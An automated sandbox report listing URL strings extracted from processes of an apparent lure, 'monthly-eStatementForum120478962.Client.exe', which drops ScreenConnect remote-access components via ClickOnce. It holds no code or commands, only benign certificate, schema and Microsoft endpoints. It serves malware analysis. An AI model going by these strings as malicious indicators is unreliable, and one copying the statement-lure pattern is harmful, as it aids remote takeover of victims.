                  Source: svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 0000000E.00000002.3157985888.000002094F21D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbA
                  Source: svchost.exe, 0000000E.00000002.3156215845.000002094E4B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3158220210.000002094F299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: monthly-eStatementForum120478962.Client.exe, 00000000.00000002.2255664157.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrust
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000004.00000002.2920493879.0000019A7EE00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningR
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRH
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: monthly-eStatementForum120478962.Client.exe, 00000000.00000002.2255664157.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256Time
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDE7D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
                  Source: svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914328789.000002094ED78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
                  Source: svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecuri
                  Source: svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 0000000E.00000002.3157558612.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837600169.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857195324.000002094ED08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874189629.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914239278.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890698251.000002094ED09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945681014.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890597917.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1912708788.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929278264.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857088725.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874058215.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837663842.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837784115.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945445109.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914301366.000002094ED0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                  Source: svchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 0000000E.00000003.1718011909.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdC
                  Source: svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsAAAA
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857145310.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914328789.000002094ED78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 0000000E.00000003.1890698251.000002094ED09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
                  Source: svchost.exe, 0000000E.00000002.3157558612.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837600169.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857195324.000002094ED08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874189629.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914239278.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890698251.000002094ED09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945681014.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890597917.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1912708788.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929278264.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857088725.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874058215.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837663842.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837784115.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945445109.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914301366.000002094ED0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdTz
                  Source: svchost.exe, 0000000E.00000003.1718011909.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsTz
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.3174278141.000001E8CC3FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.3173633903.000001E8CC340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 0000000E.00000002.3158220210.000002094F281000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157944399.000002094F200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155699966.000002094E483000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3156686908.000002094E4EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 0000000E.00000003.1874139847.000002094F233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157985888.000002094F21D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857145310.000002094ED5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
                  Source: svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueure
                  Source: svchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0
                  Source: svchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustn
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3C9A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.3158058619.00000000017D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B40BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B414C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B40E6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B40BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 0000000E.00000003.1698718052.000002094ED56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 0000000E.00000003.1698219169.000002094ED29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
